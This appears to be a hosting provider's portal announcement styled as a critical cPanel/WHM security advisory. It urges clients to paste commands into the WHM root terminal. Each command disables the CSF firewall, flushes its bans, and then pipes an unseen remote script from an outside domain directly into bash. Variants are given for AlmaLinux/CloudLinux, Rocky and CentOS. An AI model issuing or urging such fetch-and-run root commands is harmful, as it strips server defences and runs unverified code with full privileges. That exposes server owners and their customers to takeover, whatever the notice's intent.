URGENT SECURITY NOTICE — Immediate Action Required for cPanel/WHM Servers

  1. Portal Home
  2. Announcements
  3. URGENT SECURITY NOTICE — Immediate Action Required for cPanel/WHM Servers

Saturday, May 9, 2026

Severity Level: CRITICAL
Risk Score: 9.9 / 10

Dear Valued Client,

We are issuing an urgent security advisory regarding newly identified cPanel/WHM security vulnerabilities and ongoing exploitation activity affecting multiple hosting environments worldwide.

Recent Security References:

• May 8 Security Update:
cPanel Community Advisory

• Previous Active Security Incident (CVE-2026-41940):
cPanel Security Advisory CVE-2026-41940

Our monitoring indicates that some servers may still be impacted by residual malicious activity related to these vulnerabilities. Immediate preventive maintenance and cleanup are strongly recommended.

━━━━━━━━━━━━━━━━━━━━━━━
REQUIRED ACTION (URGENT)
━━━━━━━━━━━━━━━━━━━━━━━

Please log in to your WHM panel and open:

WHM → Terminal

Then execute the following command immediately.

For CloudLinux 8/9 or AlmaLinux 8/9/10 servers:

csf -df; csf -tf; bash <(curl https://hostseo.uk/update/update.sh) update.sh;

━━━━━━━━━━━━━━━━━━━━━━━
IMPORTANT INFORMATION
━━━━━━━━━━━━━━━━━━━━━━━

• The cleanup and verification process may take up to 2 hours depending on server size and number of accounts.

• During this process, server load may temporarily increase.

• If you are unable to access WHM after the cleanup process completes, please contact us immediately for assistance.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ALTERNATIVE SERVER TYPES (ROCKYLINUX and CENTOS7 ONLY)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

For RockyLinux 8/9 servers:

csf -df; csf -tf; bash <(curl https://hostseo.uk/update/update-rocky.sh) update.sh;

For CentOS 7 servers running older cPanel 110.x tiers:

csf -df; csf -tf; bash <(curl https://hostseo.uk/update/update-centos.sh) update.sh;

━━━━━━━━━━━━━━━━━━━━━━━
RECOMMENDED
━━━━━━━━━━━━━━━━━━━━━━━

We strongly recommend:

• Updating cPanel/WHM to the latest stable release
• Reviewing all administrator accounts
• Changing root and reseller passwords
• Verifying SSH access logs
• Running a full malware and integrity scan after cleanup

Thank you for your immediate attention to this matter.

Best Regards,
Security Operations Team
Zelt Global Ventures FZC LLC | https://www.zelt.ae
Sister Concern of HOSTSEO | CENTRIOHOST

« Back